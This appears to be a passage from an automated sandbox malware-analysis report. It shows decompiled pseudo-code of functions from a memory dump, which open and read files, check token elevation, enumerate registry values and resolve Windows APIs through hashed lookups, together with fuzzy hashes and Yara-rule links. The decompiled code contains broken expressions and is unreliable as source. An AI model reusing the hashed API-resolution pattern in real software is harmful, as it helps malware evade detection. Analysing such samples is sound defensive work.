				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E72AE2F8C(0x4bcc7cba, 0x80c50a91) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E72ADC328(_t24);
					if(E72ADC33C(_t24) != 0) {
						_t33[2] = E72AE352C(0x80000000);
						_t12 = 0;
						goto L14;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E72AE2F8C(0x4bcc7cba, 0xceed09cc);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E72AE35D4(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						_t15 = E72AE2F8C(0x4bcc7cba, 0xaaa9bb);
						if(_t15 == 0) {
							_t12 = 1;
							goto L14;
						} else {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							return _t15;
						}
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
					L14:
					return _t12;
				}
			}

0x72ae5b51
0x72ae5b53
0x72ae5b6a
0x72ae5b75
0x72ae5b7e
0x72ae5b84
0x72ae5b85
0x72ae5b77
0x72ae5b79
0x72ae5b79
0x72ae5b9b
0x72ae5baf
0x72ae5b9d
0x72ae5baa
0x72ae5bac
0x72ae5bac
0x72ae5bb1
0x72ae5bb6
0x72ae5bc4
0x72ae5c2f
0x72ae5c32
0x00000000
0x72ae5bc6
0x72ae5bcb
0x72ae5c18
0x72ae5c1c
0x72ae5c26
0x72ae5c26
0x72ae5c1c
0x72ae5bcd
0x72ae5bd9
0x72ae5bde
0x72ae5beb
0x72ae5bf2
0x72ae5bfe
0x00000000
0x72ae5bf4
0x72ae5bf4
0x72ae5bf5
0x72ae5bf6
0x72ae5bf8
0x72ae5bfa
0x72ae5bfb
0x72ae5bfb
0x72ae5bf2
0x72ae5b55
0x72ae5b55
0x72ae5b5c
0x72ae5bff
0x72ae5c06
0x72ae5c06

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 72AE5BAA

Memory Dump Source

Source File: 00000003.00000002.513214824.0000000072AD1000.00000020.00020000.sdmp, Offset: 72AD0000, based on PE: true

Associated: 00000003.00000002.513203598.0000000072AD0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513326388.0000000072AEA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513337524.0000000072AED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.513396860.0000000072AEF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 26c16dd84db9d2095020c93a0a859f32a102ea0508fef39e3b0ec55714086586
Instruction ID: a166bd336f996ae77ff741b50f4dfd639e76b1de913cd2a7535f0d41b848b81a
Opcode Fuzzy Hash: 26c16dd84db9d2095020c93a0a859f32a102ea0508fef39e3b0ec55714086586
Instruction Fuzzy Hash: 95014975B80206BBEF11161CECC3F3BBB5AEB85244F004969FA435608DEB6244268271

Uniqueness

Uniqueness Score: -1.00%

Function 72AE5B29, Relevance: 1.6, APIs: 1, Instructions: 57
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E72AE5B29(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t15;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E72AE2F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E72ADC328(_t24);
				if(E72ADC33C(_t24) != 0) {
					_t34[2] = E72AE352C(0xc0000000);
					_t12 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E72AE2F8C(0x4bcc7cba, 0xceed09cc);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E72AE35D4(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					_t15 = E72AE2F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t15 == 0) {
						_t12 = 1;
						L12:
						return _t12;
					} else {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						return _t15;
					}
				}
			}

0x72ae5b29
0x72ae5b2d
0x72ae5b30
0x72ae5b33
0x72ae5b75
0x72ae5b7e
0x72ae5b84
0x72ae5b85
0x72ae5b77
0x72ae5b79
0x72ae5b79
0x72ae5b9b
0x72ae5baf
0x72ae5b9d
0x72ae5baa
0x72ae5bac
0x72ae5bac
0x72ae5bb1
0x72ae5bb6
0x72ae5bc4
0x72ae5c2f
0x72ae5c32
0x00000000
0x72ae5bc6
0x72ae5bcb
0x72ae5c18
0x72ae5c1c
0x72ae5c26
0x72ae5c26
0x72ae5c1c
0x72ae5bcd
0x72ae5bd9
0x72ae5bde
0x72ae5beb
0x72ae5bf2
0x72ae5bfe
0x72ae5bff
0x72ae5c06
0x72ae5bf4
0x72ae5bf4
0x72ae5bf5
0x72ae5bf6
0x72ae5bf8
0x72ae5bfa
0x72ae5bfb
0x72ae5bfb
0x72ae5bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 72AE5BAA

Memory Dump Source

Source File: 00000003.00000002.513214824.0000000072AD1000.00000020.00020000.sdmp, Offset: 72AD0000, based on PE: true

Associated: 00000003.00000002.513203598.0000000072AD0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513326388.0000000072AEA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513337524.0000000072AED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.513396860.0000000072AEF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0fa86986c89fdfff574c3ac8d82252a53ce624ce43e07f87df1cda0750746311
Instruction ID: d22c71457a73d20c70428c4d3749d1731d5a4c4b8bdc4b097fd9ebeef8bc86ca
Opcode Fuzzy Hash: 0fa86986c89fdfff574c3ac8d82252a53ce624ce43e07f87df1cda0750746311
Instruction Fuzzy Hash: C601F770B80306BBEF151618AD83F3BBB9EEFC6344F004969FA436609DEF5188168132

Uniqueness

Uniqueness Score: -1.00%

Function 72AE5B3D, Relevance: 1.6, APIs: 1, Instructions: 56
fileCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E72AE5B3D(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t15;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E72AE2F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E72ADC328(_t24);
				if(E72ADC33C(_t24) != 0) {
					_t34[2] = E72AE352C(0xc0000000);
					_t12 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E72AE2F8C(0x4bcc7cba, 0xceed09cc);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E72AE35D4(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					_t15 = E72AE2F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t15 == 0) {
						_t12 = 1;
						L12:
						return _t12;
					} else {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						return _t15;
					}
				}
			}

0x72ae5b3d
0x72ae5b44
0x72ae5b47
0x72ae5b75
0x72ae5b7e
0x72ae5b84
0x72ae5b85
0x72ae5b77
0x72ae5b79
0x72ae5b79
0x72ae5b9b
0x72ae5baf
0x72ae5b9d
0x72ae5baa
0x72ae5bac
0x72ae5bac
0x72ae5bb1
0x72ae5bb6
0x72ae5bc4
0x72ae5c2f
0x72ae5c32
0x00000000
0x72ae5bc6
0x72ae5bcb
0x72ae5c18
0x72ae5c1c
0x72ae5c26
0x72ae5c26
0x72ae5c1c
0x72ae5bcd
0x72ae5bd9
0x72ae5bde
0x72ae5beb
0x72ae5bf2
0x72ae5bfe
0x72ae5bff
0x72ae5c06
0x72ae5bf4
0x72ae5bf4
0x72ae5bf5
0x72ae5bf6
0x72ae5bf8
0x72ae5bfa
0x72ae5bfb
0x72ae5bfb
0x72ae5bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 72AE5BAA

Memory Dump Source

Source File: 00000003.00000002.513214824.0000000072AD1000.00000020.00020000.sdmp, Offset: 72AD0000, based on PE: true

Associated: 00000003.00000002.513203598.0000000072AD0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513326388.0000000072AEA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513337524.0000000072AED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.513396860.0000000072AEF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5b8d02cd4674f4ed770eb1c7c80a412027ed08d7cd8f65890b2514b95d1dd015
Instruction ID: 798e2e0f9e22f4a8f50bf7cd00c46a685e75d57294bf8040c70ea592b0f80fc2
Opcode Fuzzy Hash: 5b8d02cd4674f4ed770eb1c7c80a412027ed08d7cd8f65890b2514b95d1dd015
Instruction Fuzzy Hash: 5201F774B803067BEF1116189D83F3F7B5AEB86344F004969FA436109DEF6184168232

Uniqueness

Uniqueness Score: -1.00%

Function 72AE5B1F, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E72AE5B1F(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t14;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E72AE2F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E72ADC328(_t23);
				if(E72ADC33C(_t23) != 0) {
					_t31[2] = E72AE352C(0x100);
					_t11 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E72AE2F8C(0x4bcc7cba, 0xceed09cc);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E72AE35D4(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					_t14 = E72AE2F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t14 == 0) {
						_t11 = 1;
						L12:
						return _t11;
					} else {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						return _t14;
					}
				}
			}

0x72ae5b1f
0x72ae5b26
0x72ae5b75
0x72ae5b7e
0x72ae5b84
0x72ae5b85
0x72ae5b77
0x72ae5b79
0x72ae5b79
0x72ae5b9b
0x72ae5baf
0x72ae5b9d
0x72ae5baa
0x72ae5bac
0x72ae5bac
0x72ae5bb1
0x72ae5bb6
0x72ae5bc4
0x72ae5c2f
0x72ae5c32
0x00000000
0x72ae5bc6
0x72ae5bcb
0x72ae5c18
0x72ae5c1c
0x72ae5c26
0x72ae5c26
0x72ae5c1c
0x72ae5bcd
0x72ae5bd9
0x72ae5bde
0x72ae5beb
0x72ae5bf2
0x72ae5bfe
0x72ae5bff
0x72ae5c06
0x72ae5bf4
0x72ae5bf4
0x72ae5bf5
0x72ae5bf6
0x72ae5bf8
0x72ae5bfa
0x72ae5bfb
0x72ae5bfb
0x72ae5bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 72AE5BAA

Memory Dump Source

Source File: 00000003.00000002.513214824.0000000072AD1000.00000020.00020000.sdmp, Offset: 72AD0000, based on PE: true

Associated: 00000003.00000002.513203598.0000000072AD0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513326388.0000000072AEA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513337524.0000000072AED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.513396860.0000000072AEF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c230670b004b2ad28e76934f353d99ed69517ec83133175e69b5ed079cd00cba
Instruction ID: 4ac6b07ee52a1eaecc498d6db71a0bd3bc507f2af6dbfc16b908d5270bc2d5a6
Opcode Fuzzy Hash: c230670b004b2ad28e76934f353d99ed69517ec83133175e69b5ed079cd00cba
Instruction Fuzzy Hash: CC01D670B80306BBEF1116189D93F3BBB5EEB86344F000969FA436109DEF6194268272

Uniqueness

Uniqueness Score: -1.00%

Function 72AE5B6D, Relevance: 1.6, APIs: 1, Instructions: 51
fileCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E72AE5B6D(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t14;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E72AE2F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E72ADC328(_t23);
				if(E72ADC33C(_t23) != 0) {
					_t31[2] = E72AE352C(0);
					_t11 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E72AE2F8C(0x4bcc7cba, 0xceed09cc);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E72AE35D4(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					_t14 = E72AE2F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t14 == 0) {
						_t11 = 1;
						L12:
						return _t11;
					} else {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						return _t14;
					}
				}
			}

0x72ae5b6d
0x72ae5b71
0x72ae5b75
0x72ae5b7e
0x72ae5b84
0x72ae5b85
0x72ae5b77
0x72ae5b79
0x72ae5b79
0x72ae5b9b
0x72ae5baf
0x72ae5b9d
0x72ae5baa
0x72ae5bac
0x72ae5bac
0x72ae5bb1
0x72ae5bb6
0x72ae5bc4
0x72ae5c2f
0x72ae5c32
0x00000000
0x72ae5bc6
0x72ae5bcb
0x72ae5c18
0x72ae5c1c
0x72ae5c26
0x72ae5c26
0x72ae5c1c
0x72ae5bcd
0x72ae5bd9
0x72ae5bde
0x72ae5beb
0x72ae5bf2
0x72ae5bfe
0x72ae5bff
0x72ae5c06
0x72ae5bf4
0x72ae5bf4
0x72ae5bf5
0x72ae5bf6
0x72ae5bf8
0x72ae5bfa
0x72ae5bfb
0x72ae5bfb
0x72ae5bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 72AE5BAA

Memory Dump Source

Source File: 00000003.00000002.513214824.0000000072AD1000.00000020.00020000.sdmp, Offset: 72AD0000, based on PE: true

Associated: 00000003.00000002.513203598.0000000072AD0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513326388.0000000072AEA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513337524.0000000072AED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.513396860.0000000072AEF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f41fd778113157c199e1483cbf3e3356fcc1afe5b5c32d8304a410e71b511c74
Instruction ID: d6ee6a0a36e87a264bf0a3f53a61a9c9e5876f2a71237cd8f43cb494634f35ce
Opcode Fuzzy Hash: f41fd778113157c199e1483cbf3e3356fcc1afe5b5c32d8304a410e71b511c74
Instruction Fuzzy Hash: 0DF0D174B80306BBEF1116189D92F3BBB6EEB86644F000968BA436109DEF6194268272

Uniqueness

Uniqueness Score: -1.00%

Function 72AE5D7C, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E72AE5D7C(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E72ADC33C(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
				} else {
					asm("stosd");
					asm("stosd");
					if(E72AE2F8C(0x4bcc7cba, 0xceed09cc) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}

0x72ae5d80
0x72ae5d81
0x72ae5d83
0x72ae5d89
0x72ae5d8b
0x72ae5d8f
0x72ae5d8f
0x72ae5d93
0x72ae5d9f
0x72ae5dd3
0x72ae5dd3
0x00000000
0x72ae5da1
0x72ae5da6
0x72ae5da7
0x72ae5dbb
0x72ae5dcc
0x72ae5dbd
0x72ae5dc8
0x72ae5dc8
0x72ae5dd1
0x72ae5dd9
0x72ae5ddb
0x72ae5dde
0x72ae5de3
0x72ae5de3
0x72ae5de7
0x72ae5dec
0x00000000
0x00000000
0x00000000
0x72ae5dd1

APIs

SetFilePointer.KERNELBASE(?,00000000,?,00000001,CEED09CC,?,?,00000000,00000000,?,72AE5CB4,?,?), ref: 72AE5DC8

Memory Dump Source

Source File: 00000003.00000002.513214824.0000000072AD1000.00000020.00020000.sdmp, Offset: 72AD0000, based on PE: true

Associated: 00000003.00000002.513203598.0000000072AD0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513326388.0000000072AEA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513337524.0000000072AED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.513396860.0000000072AEF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 7634ac0c9d3648873fd736d4ea4b19d370915cdf3bd7e6405098399fd11748dd
Instruction ID: 1148260daf66837cd8ec201145a9cb7f3e85bb89171049c948f5f97c7eed46ba
Opcode Fuzzy Hash: 7634ac0c9d3648873fd736d4ea4b19d370915cdf3bd7e6405098399fd11748dd
Instruction Fuzzy Hash: EAF04931E047112ADB119A3CECC5B8FB7E5DFD5320F200B2DF583A604CEB6084428690

Uniqueness

Uniqueness Score: -1.00%

Function 72AE10CC, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E72AE10CC(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E72AE2F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E72AE2F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0xd0443454
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}

0x72ae10da
0x72ae10dc
0x72ae10ea
0x72ae10ee
0x72ae1137
0x00000000
0x72ae1137
0x72ae10f3
0x72ae10f4
0x72ae10f6
0x72ae10fb
0x00000000
0x72ae1114
0x72ae1118
0x72ae1125
0x72ae1129
0x00000000
0x00000000
0x00000000
0x72ae1132

APIs

GetTokenInformation.KERNELBASE(00000004,00000014,D0443454,00000004,D0443458,D0443458,D0443458), ref: 72AE1125

Memory Dump Source

Source File: 00000003.00000002.513214824.0000000072AD1000.00000020.00020000.sdmp, Offset: 72AD0000, based on PE: true

Associated: 00000003.00000002.513203598.0000000072AD0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513326388.0000000072AEA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513337524.0000000072AED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.513396860.0000000072AEF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: ad9c72b20c447e21fde483402609026f9e34a91fec1d63206d321a76ac7e48c5
Instruction ID: b142ab06581e722ab10ae6728188e44dde57dc943fdfc2180f6a1fad190418c1
Opcode Fuzzy Hash: ad9c72b20c447e21fde483402609026f9e34a91fec1d63206d321a76ac7e48c5
Instruction Fuzzy Hash: E3F0A9B4B443866BFB04952CCD06F7B22AD5BC5704F01C86CB543DA19CEB78CC1A8321

Uniqueness

Uniqueness Score: -1.00%

Function 72AE55B8, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E72AE55B8(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E72AE2F8C(0xd0443458, 0x286b2253) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E72ADE6E8(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}

0x72ae55c2
0x72ae55c4
0x72ae55cb
0x72ae55cd
0x72ae55d1
0x72ae55d3
0x72ae55d6
0x72ae55d9
0x72ae55d9
0x72ae55f3
0x00000000
0x00000000
0x72ae5604
0x72ae5608
0x00000000
0x00000000
0x72ae5616
0x72ae5619
0x72ae561e
0x72ae5623
0x72ae5623

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,D0443458,286B2253,?,?,D0443458,286B2253), ref: 72AE5604

Memory Dump Source

Source File: 00000003.00000002.513214824.0000000072AD1000.00000020.00020000.sdmp, Offset: 72AD0000, based on PE: true

Associated: 00000003.00000002.513203598.0000000072AD0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513326388.0000000072AEA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513337524.0000000072AED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.513396860.0000000072AEF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: 32541c393d7cf9c9ac655dde4adff585132c35c09fbad7829b6a85831b260ca8
Instruction ID: bc6219b3ec176607dbb6b9bf150b4132ed416032e80535b461d0b34083e9f510
Opcode Fuzzy Hash: 32541c393d7cf9c9ac655dde4adff585132c35c09fbad7829b6a85831b260ca8
Instruction Fuzzy Hash: 66F0C2B5A003096FE7259E1EED44CB7BBEDEBC4B14F00841EB0D743204DA30AC218AB1

Uniqueness

Uniqueness Score: -1.00%

Function 72AE5DF0, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E72AE5DF0(void* __ecx, void* __eflags, void* _a4, long _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E72ADC33C(_t19) == 0) {
					_v12 = _a8;
					if(E72AE2F8C(0x4bcc7cba, 0x2876e068) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E72AE352C(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}

0x72ae5df3
0x72ae5df5
0x72ae5e01
0x72ae5e0b
0x72ae5e21
0x72ae5e40
0x72ae5e23
0x72ae5e34
0x72ae5e38
0x72ae5e58
0x72ae5e3a
0x72ae5e3a
0x72ae5e3a
0x72ae5e38
0x72ae5e41
0x72ae5e46
0x72ae5e4f
0x72ae5e48
0x72ae5e48
0x72ae5e4a
0x72ae5e4a
0x72ae5e03
0x72ae5e03
0x72ae5e03
0x72ae5e55

APIs

ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,4BCC7CBA,2876E068,?,?,?,72AE5CE5,00000000,?,00000000,?), ref: 72AE5E34

Memory Dump Source

Source File: 00000003.00000002.513214824.0000000072AD1000.00000020.00020000.sdmp, Offset: 72AD0000, based on PE: true

Associated: 00000003.00000002.513203598.0000000072AD0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513326388.0000000072AEA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513337524.0000000072AED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.513396860.0000000072AEF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 6762ad9e688c98861c5b697065b5bdf6121a2abcf83bb2bb4119fe35680c4d3b
Instruction ID: 7610bfe317bc8d0532f9dcc9fc2f3cb50b921fa391d8e72a8c9c73fd065511a8
Opcode Fuzzy Hash: 6762ad9e688c98861c5b697065b5bdf6121a2abcf83bb2bb4119fe35680c4d3b
Instruction Fuzzy Hash: 33F08631A48202AFDF15BA2CECC1A6A77E5AB48240F104829E89BD215CDB31D4158F21

Uniqueness

Uniqueness Score: -1.00%

Function 72AE3564, Relevance: 1.5, APIs: 1, Instructions: 42
memoryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E72AE3564(void* __ecx) {
				void* _t3;
				intOrPtr* _t8;
				void* _t12;

				_t12 = __ecx;
				if( *0x72aed228 == 0xcd845700) {
					_t8 = E72AE2F8C(0xa5eabdf8, 0xd926c223);
					 *0x72aed22c = E72AE2F8C(0xa5eabdf8, 0x9b42cb07);
					if( *0x72aed228 == 0xcd845700) {
						 *_t8(2, 0, 0, 0, 0, 0); // executed
						 *0x72aed228 = 0;
					}
				}
				_t3 = E72AE2F8C(0xa5eabdf8, 0x80febacc);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t12);
					_push(8);
					_push( *0x72aed228);
					asm("int3");
					return _t3;
				}
			}

0x72ae356c
0x72ae3574
0x72ae35a7
0x72ae35b8
0x72ae35c3
0x72ae35ce
0x72ae35d0
0x72ae35d0
0x72ae35c3
0x72ae3580
0x72ae3587
0x72ae3597
0x72ae3589
0x72ae3589
0x72ae358a
0x72ae358c
0x72ae358e
0x72ae358f
0x72ae358f

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,A5EABDF8,9B42CB07,A5EABDF8,D926C223,?,?,00000000,72ADDEB9,?,?), ref: 72AE35CE

Memory Dump Source

